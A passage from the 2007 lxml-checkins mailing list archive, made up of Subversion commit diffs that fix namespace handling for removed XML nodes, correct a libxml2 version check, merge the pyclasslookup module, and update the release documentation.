""" cdef xmlNode* c_next c_next = c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) - attemptDeallocation(c_node) + if not attemptDeallocation(c_node): + # make namespaces absolute + moveNodeToDocument(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -522,7 +525,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. """ cdef xmlNode* c_next @@ -536,7 +540,7 @@ if _isElement(c_node): while c_next is not NULL and not _isElement(c_next): c_next = c_next.next - _removeNode(c_node) + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node @@ -555,7 +559,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(child, parent._doc) + moveNodeToDocument(parent._doc, c_node) cdef void _appendSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -571,7 +575,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef void _prependSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -587,7 +591,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. 
- moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef int isutf8(char* s): cdef char c Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Fri Jun 22 19:33:41 2007 @@ -453,8 +453,9 @@ _removeText(c_node.next) tree.xmlReplaceNode(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) - attemptDeallocation(c_node) + moveNodeToDocument(self._doc, element._c_node) + if not attemptDeallocation(c_node): + moveNodeToDocument(self._doc, c_node) def __delitem__(self, Py_ssize_t index): """Deletes the given subelement. @@ -464,14 +465,14 @@ if c_node is NULL: raise IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. """ cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -487,7 +488,7 @@ c_node = _findChild(self._c_node, start) # now delete the slice if c_node is not NULL and start != stop: - c_node = _deleteSlice(c_node, start, stop) + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -505,7 +506,7 @@ # and move tail just behind his node _moveTail(c_next, element._c_node) # move it into a new document - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def __deepcopy__(self, memo): return self.__copy__() @@ -599,7 +600,7 @@ if _isElement(c_node): while c_node_next is not NULL and not _isElement(c_node_next): c_node_next = c_node_next.next - _removeNode(c_node) + 
_removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): @@ -614,7 +615,7 @@ c_next = element._c_node.next tree.xmlAddPrevSibling(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def remove(self, _Element element not None): """Removes a matching subelement. Unlike the find methods, this @@ -629,6 +630,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, _Element new_element not None): @@ -647,7 +649,7 @@ tree.xmlReplaceNode(c_old_node, c_new_node) _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) - moveNodeToDocument(new_element, self._doc) + moveNodeToDocument(self._doc, c_new_node) # PROPERTIES property tag: Modified: lxml/trunk/src/lxml/proxy.pxi ============================================================================== --- lxml/trunk/src/lxml/proxy.pxi (original) +++ lxml/trunk/src/lxml/proxy.pxi Fri Jun 22 19:33:41 2007 @@ -116,19 +116,21 @@ ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. 
@@ -184,14 +186,14 @@ ################################################################################ # fix _Document references and namespaces when a node changes documents -cdef void moveNodeToDocument(_Element node, _Document doc): +cdef void moveNodeToDocument(_Document doc, xmlNode* c_element): """Fix the xmlNs pointers of a node and its subtree that were moved. Mainly copied from libxml2's xmlReconciliateNs(). Expects libxml2 doc pointers of node to be correct already, but fixes _Document references. """ + cdef _Element element cdef xmlDoc* c_doc - cdef xmlNode* c_element cdef xmlNode* c_start_node cdef xmlNode* c_node cdef xmlNs** c_ns_new_cache @@ -202,12 +204,10 @@ cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last - c_element = node._c_node - c_doc = c_element.doc - if not tree._isElementOrXInclude(c_element): return + c_doc = c_element.doc c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -301,7 +301,9 @@ # fix _Document reference (may dealloc the original document!) 
if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + element._doc = doc if c_element is c_start_node: break Modified: lxml/trunk/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_elementtree.py (original) +++ lxml/trunk/src/lxml/tests/test_elementtree.py Fri Jun 22 19:33:41 2007 @@ -1325,6 +1325,22 @@ self.assertXML( '', a) + + def test_remove_ns(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + + a = Element('{http://test}a') + b = SubElement(a, '{http://test}b') + c = SubElement(a, '{http://test}c') + + a.remove(b) + self.assertXML( + '', + a) + self.assertXML( + '', + b) def test_remove_nonexisting(self): Element = self.etree.Element From scoder at codespeak.net Fri Jun 22 19:34:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:34:24 +0200 (CEST) Subject: [Lxml-checkins] r44435 - in lxml/branch/lxml-1.3: . 
src/lxml src/lxml/tests Message-ID: <20070622173424.D95F48125@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:34:24 2007 New Revision: 44435 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/proxy.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: trunk merge: make removed nodes ns-self-contained Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 22 19:34:24 2007 @@ -27,6 +27,9 @@ Bugs fixed ---------- +* Removing Elements from a tree could make them lose their namespace + declarations + * ``ElementInclude`` didn't honour base URL of original document * Replacing the children slice of an Element would cut off the tails of the Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Fri Jun 22 19:34:24 2007 @@ -487,14 +487,17 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): - """Unlink and free a node and subnodes if possible. +cdef void _removeNode(_Document doc, xmlNode* c_node): + """Unlink and free a node and subnodes if possible. Otherwise, make sure + it's self-contained. 
""" cdef xmlNode* c_next c_next = c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) - attemptDeallocation(c_node) + if not attemptDeallocation(c_node): + # make namespaces absolute + moveNodeToDocument(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -522,7 +525,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. """ cdef xmlNode* c_next @@ -536,7 +540,7 @@ if _isElement(c_node): while c_next is not NULL and not _isElement(c_next): c_next = c_next.next - _removeNode(c_node) + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node @@ -555,7 +559,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(child, parent._doc) + moveNodeToDocument(parent._doc, c_node) cdef void _appendSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -571,7 +575,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef void _prependSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -587,7 +591,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. 
- moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef int isutf8(char* s): cdef char c Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Fri Jun 22 19:34:24 2007 @@ -453,8 +453,9 @@ _removeText(c_node.next) tree.xmlReplaceNode(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) - attemptDeallocation(c_node) + moveNodeToDocument(self._doc, element._c_node) + if not attemptDeallocation(c_node): + moveNodeToDocument(self._doc, c_node) def __delitem__(self, Py_ssize_t index): """Deletes the given subelement. @@ -464,14 +465,14 @@ if c_node is NULL: raise IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. 
""" cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -487,7 +488,7 @@ c_node = _findChild(self._c_node, start) # now delete the slice if c_node is not NULL and start != stop: - c_node = _deleteSlice(c_node, start, stop) + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -505,7 +506,7 @@ # and move tail just behind his node _moveTail(c_next, element._c_node) # move it into a new document - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def __deepcopy__(self, memo): return self.__copy__() @@ -599,7 +600,7 @@ if _isElement(c_node): while c_node_next is not NULL and not _isElement(c_node_next): c_node_next = c_node_next.next - _removeNode(c_node) + _removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): @@ -614,7 +615,7 @@ c_next = element._c_node.next tree.xmlAddPrevSibling(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def remove(self, _Element element not None): """Removes a matching subelement. 
Unlike the find methods, this @@ -629,6 +630,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, _Element new_element not None): @@ -647,7 +649,7 @@ tree.xmlReplaceNode(c_old_node, c_new_node) _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) - moveNodeToDocument(new_element, self._doc) + moveNodeToDocument(self._doc, c_new_node) # PROPERTIES property tag: Modified: lxml/branch/lxml-1.3/src/lxml/proxy.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/proxy.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/proxy.pxi Fri Jun 22 19:34:24 2007 @@ -116,19 +116,21 @@ ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. @@ -184,14 +186,14 @@ ################################################################################ # fix _Document references and namespaces when a node changes documents -cdef void moveNodeToDocument(_Element node, _Document doc): +cdef void moveNodeToDocument(_Document doc, xmlNode* c_element): """Fix the xmlNs pointers of a node and its subtree that were moved. Mainly copied from libxml2's xmlReconciliateNs(). 
Expects libxml2 doc pointers of node to be correct already, but fixes _Document references. """ + cdef _Element element cdef xmlDoc* c_doc - cdef xmlNode* c_element cdef xmlNode* c_start_node cdef xmlNode* c_node cdef xmlNs** c_ns_new_cache @@ -202,12 +204,10 @@ cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last - c_element = node._c_node - c_doc = c_element.doc - if not tree._isElementOrXInclude(c_element): return + c_doc = c_element.doc c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -301,7 +301,9 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + element._doc = doc if c_element is c_start_node: break Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Fri Jun 22 19:34:24 2007 @@ -1325,6 +1325,22 @@ self.assertXML( '', a) + + def test_remove_ns(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + + a = Element('{http://test}a') + b = SubElement(a, '{http://test}b') + c = SubElement(a, '{http://test}c') + + a.remove(b) + self.assertXML( + '', + a) + self.assertXML( + '', + b) def test_remove_nonexisting(self): Element = self.etree.Element Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Fri Jun 22 19:34:24 2007 @@ -1362,7 +1362,7 @@ def test_sourceline_parse(self): parse = self.etree.parse - tree = parse(fileInTestDir('test_xinclude.xml')) + tree = parse(fileInTestDir('include/test_xinclude.xml')) 
self.assertEquals( [1, 2, 3], From scoder at codespeak.net Fri Jun 22 19:52:33 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:52:33 +0200 (CEST) Subject: [Lxml-checkins] r44436 - lxml/trunk/src/lxml Message-ID: <20070622175233.2EEC78124@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:52:31 2007 New Revision: 44436 Modified: lxml/trunk/src/lxml/xmlschema.pxi Log: off-by-one version check Modified: lxml/trunk/src/lxml/xmlschema.pxi ============================================================================== --- lxml/trunk/src/lxml/xmlschema.pxi (original) +++ lxml/trunk/src/lxml/xmlschema.pxi Fri Jun 22 19:52:31 2007 @@ -61,7 +61,7 @@ if parser_ctxt is not NULL: self._c_schema = xmlschema.xmlSchemaParse(parser_ctxt) - if _LIBXML_VERSION_INT > 20624: + if _LIBXML_VERSION_INT >= 20624: xmlschema.xmlSchemaFreeParserCtxt(parser_ctxt) self._error_log.disconnect() From scoder at codespeak.net Fri Jun 22 20:20:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 20:20:24 +0200 (CEST) Subject: [Lxml-checkins] r44437 - in lxml/branch/lxml-1.3: . 
doc src/lxml src/lxml/tests Message-ID: <20070622182024.11305811F@code0.codespeak.net> Author: scoder Date: Fri Jun 22 20:20:24 2007 New Revision: 44437 Added: lxml/branch/lxml-1.3/src/lxml/pyclasslookup.pyx - copied unchanged from r44436, lxml/trunk/src/lxml/pyclasslookup.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_pyclasslookup.py - copied unchanged from r44436, lxml/trunk/src/lxml/tests/test_pyclasslookup.py Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/element_classes.txt lxml/branch/lxml-1.3/setupinfo.py Log: merged in pyclasslookup from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 22 20:20:24 2007 @@ -8,6 +8,9 @@ Features added -------------- +* Module ``lxml.pyclasslookup`` implements an Element class lookup scheme that + can access the entire tree to determine a suitable Element class + * Parsers take a ``remove_comments`` keyword argument that skips over comments * ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. Modified: lxml/branch/lxml-1.3/doc/element_classes.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/element_classes.txt (original) +++ lxml/branch/lxml-1.3/doc/element_classes.txt Fri Jun 22 20:20:24 2007 @@ -91,7 +91,8 @@ >>> parser.setElementClassLookup(parser_lookup) There is one drawback of the parser based scheme: the ``Element()`` factory -creates a new document that deploys the default parser:: +does not know about your specialised parser and creates a new document that +deploys the default parser:: >>> el = etree.Element("root") >>> print isinstance(el, HonkElement) @@ -234,8 +235,8 @@ Custom element class lookup --------------------------- -This is the most customisable way of finding element classes. 
It allows you -to implement a custom lookup scheme in a subclass:: +This is the most customisable way of finding element classes on a per-element +basis. It allows you to implement a custom lookup scheme in a subclass:: >>> class MyLookup(etree.CustomElementClassLookup): ... def lookup(self, node_type, document, namespace, name): @@ -253,6 +254,45 @@ per-parser setup. +Tree based element class lookup in Python +......................................... + +Taking more elaborate decisions than allowed by the custom scheme is difficult +to achieve in pure Python. It would require access to the tree - before the +elements in the tree have been instantiated as Python Element objects. + +Luckily, there is a way to do this. The separate module +``lxml.pyclasslookup`` provides a lookup class called +``PythonElementClassLookup`` that works similarly to the custom lookup scheme:: + + >>> from lxml.pyclasslookup import PythonElementClassLookup + >>> class MyLookup(PythonElementClassLookup): + ... def lookup(self, document, element): + ... return MyElementClass # defined elsewhere + + >>> parser = etree.XMLParser() + >>> parser.setElementClassLookup(MyLookup()) + +As before, the first argument to the ``lookup()`` method is the opaque +document instance that contains the Element. The second argument is a +lightweight Element proxy implementation that is only valid during the lookup. +Do not try to keep a reference to it. Once the lookup is finished, the proxy +will become invalid. You will get an ``AssertionError`` if you access any of +the properties or methods outside the scope of the lookup call where they were +instantiated. + +During the lookup, the element object behaves mostly like a normal Element +instance. It provides the properties ``tag``, ``text``, ``tail`` etc. and +supports indexing, slicing and the ``getchildren()``, ``getparent()`` +etc. methods. It does *not* support iteration, nor does it support any kind +of modification. 
All of its properties are read-only and it cannot be removed +or inserted into other trees. You can use it as a starting point to freely +traverse the tree and collect any kind of information that its elements +provide. Once you have taken the decision which class to use for this +element, you can simply return it and have lxml take care of cleaning up the +instantiated proxy classes. + + Implementing namespaces ======================= Modified: lxml/branch/lxml-1.3/setupinfo.py ============================================================================== --- lxml/branch/lxml-1.3/setupinfo.py (original) +++ lxml/branch/lxml-1.3/setupinfo.py Fri Jun 22 20:20:24 2007 @@ -8,8 +8,9 @@ PYREX_INSTALLED = False EXT_MODULES = [ - ("etree", "lxml.etree"), - ("objectify", "lxml.objectify") + ("etree", "lxml.etree"), + ("objectify", "lxml.objectify"), + ("pyclasslookup", "lxml.pyclasslookup") ] From scoder at codespeak.net Fri Jun 22 22:09:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 22:09:24 +0200 (CEST) Subject: [Lxml-checkins] r44442 - in lxml/branch/lxml-1.3/doc: . 
html Message-ID: <20070622200924.9691280EE@code0.codespeak.net> Author: scoder Date: Fri Jun 22 22:09:24 2007 New Revision: 44442 Modified: lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/doc/main.txt Log: doc updates for 1.3 release, some layouting, new front-page eye-catcher Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Fri Jun 22 22:09:24 2007 @@ -205,6 +205,12 @@ font-style: italic; } +div.line-block { + font-family: Times, "Times New Roman", serif; + text-align: center; + font-size: 140%; +} + code { color: Black; background-color: #cccccc; Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Fri Jun 22 22:09:24 2007 @@ -1,7 +1,15 @@ lxml ==== -.. contents:: +.. meta:: + :description: lxml - the most feature-rich and easy-to-use library for working with XML and HTML in the Python language + :keywords: lxml, etree, objectify, Python, XML, HTML + +| lxml is the most feature-rich +| and easy-to-use library +| for working with XML and HTML +| in the Python language. + .. 1 Introduction 2 Documentation @@ -14,9 +22,11 @@ Introduction ------------ -lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. See the -introduction_ for more information about background and goals. Some common -questions are answered in the FAQ_. +lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. It is +unique in that it combines the speed and feature completeness of these +libraries with the simplicity of a native Python API. See the introduction_ +for more information about background and goals. Some common questions are +answered in the FAQ_. .. _libxml2: http://xmlsoft.org .. 
_libxslt: http://xmlsoft.org/XSLT @@ -119,11 +129,9 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). `Older versions`_ are listed below. -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html .. _`Older versions`: #old-versions Please take a look at the `installation instructions`_! @@ -150,7 +158,11 @@ Questions? Suggestions? Code to contribute? We have a `mailing list`_. +You can search the archive with Gmane_ or Google_. + .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _Gmane: http://blog.gmane.org/gmane.comp.python.lxml.devel +.. _Google: http://www.google.com/webhp?q=site:codespeak.net/mailman/listinfo/lxml-dev%20 License @@ -200,6 +212,7 @@ * `lxml 0.5`_, released 2005-04-08 +.. _`lxml 1.3`: lxml-1.3.tgz .. _`lxml 1.2.1`: lxml-1.2.1.tgz .. _`lxml 1.2`: lxml-1.2.tgz .. _`lxml 1.1.2`: lxml-1.1.2.tgz @@ -219,6 +232,7 @@ .. _`lxml 0.5.1`: lxml-0.5.1.tgz .. _`lxml 0.5`: lxml-0.5.tgz +.. _`CHANGES for 1.3`: changes-1.3.html .. _`changes for 1.2.1`: changes-1.2.1.html .. _`changes for 1.2`: changes-1.2.html .. 
_`changes for 1.1.2`: changes-1.1.2.html From scoder at codespeak.net Fri Jun 22 22:13:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 22:13:58 +0200 (CEST) Subject: [Lxml-checkins] r44443 - lxml/branch/lxml-1.3/doc Message-ID: <20070622201358.C0F04812E@code0.codespeak.net> Author: scoder Date: Fri Jun 22 22:13:58 2007 New Revision: 44443 Modified: lxml/branch/lxml-1.3/doc/main.txt Log: link to licenses from docs Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Fri Jun 22 22:13:58 2007 @@ -168,10 +168,13 @@ License ------- -The lxml library is shipped under a BSD license. libxml2 and libxslt2 -itself are shipped under the MIT license. There should therefore be no +The lxml library is shipped under a `BSD license`_. libxml2 and libxslt2 +itself are shipped under the `MIT license`_. There should therefore be no obstacle to using lxml in your codebase. +.. _`BSD license`: http://codespeak.net/svn/lxml/trunk/doc/licenses/BSD.txt +.. _`MIT license`: http://www.opensource.org/licenses/mit-license.html + Old Versions ------------ From scoder at codespeak.net Fri Jun 22 22:16:10 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 22:16:10 +0200 (CEST) Subject: [Lxml-checkins] r44444 - in lxml/trunk/doc: . 
html Message-ID: <20070622201610.2DBCF812E@code0.codespeak.net> Author: scoder Date: Fri Jun 22 22:16:09 2007 New Revision: 44444 Modified: lxml/trunk/doc/html/style.css lxml/trunk/doc/main.txt Log: merged in release doc updates from 1.3 branch Modified: lxml/trunk/doc/html/style.css ============================================================================== --- lxml/trunk/doc/html/style.css (original) +++ lxml/trunk/doc/html/style.css Fri Jun 22 22:16:09 2007 @@ -205,6 +205,12 @@ font-style: italic; } +div.line-block { + font-family: Times, "Times New Roman", serif; + text-align: center; + font-size: 140%; +} + code { color: Black; background-color: #cccccc; Modified: lxml/trunk/doc/main.txt ============================================================================== --- lxml/trunk/doc/main.txt (original) +++ lxml/trunk/doc/main.txt Fri Jun 22 22:16:09 2007 @@ -1,7 +1,15 @@ lxml ==== -.. contents:: +.. meta:: + :description: lxml - the most feature-rich and easy-to-use library for working with XML and HTML in the Python language + :keywords: lxml, etree, objectify, Python, XML, HTML + +| lxml is the most feature-rich +| and easy-to-use library +| for working with XML and HTML +| in the Python language. + .. 1 Introduction 2 Documentation @@ -14,9 +22,11 @@ Introduction ------------ -lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. See the -introduction_ for more information about background and goals. Some common -questions are answered in the FAQ_. +lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. It is +unique in that it combines the speed and feature completeness of these +libraries with the simplicity of a native Python API. See the introduction_ +for more information about background and goals. Some common questions are +answered in the FAQ_. .. _libxml2: http://xmlsoft.org .. _libxslt: http://xmlsoft.org/XSLT @@ -119,11 +129,9 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. 
_`this key`: pubkey.asc -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). `Older versions`_ are listed below. -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html .. _`Older versions`: #old-versions Please take a look at the `installation instructions`_! @@ -150,16 +158,23 @@ Questions? Suggestions? Code to contribute? We have a `mailing list`_. +You can search the archive with Gmane_ or Google_. + .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _Gmane: http://blog.gmane.org/gmane.comp.python.lxml.devel +.. _Google: http://www.google.com/webhp?q=site:codespeak.net/mailman/listinfo/lxml-dev%20 License ------- -The lxml library is shipped under a BSD license. libxml2 and libxslt2 -itself are shipped under the MIT license. There should therefore be no +The lxml library is shipped under a `BSD license`_. libxml2 and libxslt2 +itself are shipped under the `MIT license`_. There should therefore be no obstacle to using lxml in your codebase. +.. _`BSD license`: http://codespeak.net/svn/lxml/trunk/doc/licenses/BSD.txt +.. _`MIT license`: http://www.opensource.org/licenses/mit-license.html + Old Versions ------------ @@ -200,6 +215,7 @@ * `lxml 0.5`_, released 2005-04-08 +.. _`lxml 1.3`: lxml-1.3.tgz .. _`lxml 1.2.1`: lxml-1.2.1.tgz .. _`lxml 1.2`: lxml-1.2.tgz .. _`lxml 1.1.2`: lxml-1.1.2.tgz @@ -219,6 +235,7 @@ .. _`lxml 0.5.1`: lxml-0.5.1.tgz .. _`lxml 0.5`: lxml-0.5.tgz +.. _`CHANGES for 1.3`: changes-1.3.html .. _`changes for 1.2.1`: changes-1.2.1.html .. _`changes for 1.2`: changes-1.2.html .. 
_`changes for 1.1.2`: changes-1.1.2.html From scoder at codespeak.net Sat Jun 23 09:31:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:31:48 +0200 (CEST) Subject: [Lxml-checkins] r44460 - lxml/trunk/src/lxml Message-ID: <20070623073148.951788143@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:31:46 2007 New Revision: 44460 Modified: lxml/trunk/src/lxml/builder.py Log: pass a makeelement() function instead of a parser Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Sat Jun 23 09:31:46 2007 @@ -121,9 +121,10 @@ """ - def __init__(self, typemap=None, parser=None): - if parser is not None: - self._makeelement = parser.makeelement + def __init__(self, typemap=None, makeelement=None): + if makeelement is not None: + assert callable(makeelement) + self._makeelement = makeelement else: self._makeelement = ET.Element From scoder at codespeak.net Sat Jun 23 09:31:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:31:48 +0200 (CEST) Subject: [Lxml-checkins] r44461 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070623073148.A5F2A8141@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:31:48 2007 New Revision: 44461 Modified: 